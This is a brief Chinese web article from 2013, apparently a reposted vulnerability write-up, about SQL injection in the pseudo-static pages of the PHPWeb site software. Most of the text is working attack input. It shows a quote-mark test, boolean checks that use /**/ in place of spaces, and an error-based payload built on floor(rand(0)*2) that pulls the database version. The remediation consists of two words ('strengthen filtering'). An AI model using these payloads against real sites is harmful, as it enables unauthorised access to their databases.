当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

phpweb伪静态页面注入及修复

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

phpweb所有的整站程序伪静态页面都存在sql注入

 

主站:

加’检测:

 

?772′.html

 

出错

存在注入。

不能用空格,涛涛电脑知识网,只能用/*罗

?56′/**/and/**/1=1/*.html 正常

 

/page/html/?56′/**/and/**/1=2/*.html 出错.

爆数据库版本:

 

?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

更新日期: 2013-01-03 13:39:50

 

修复方案

 

加强过滤

 

,www.xuhantao.com

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1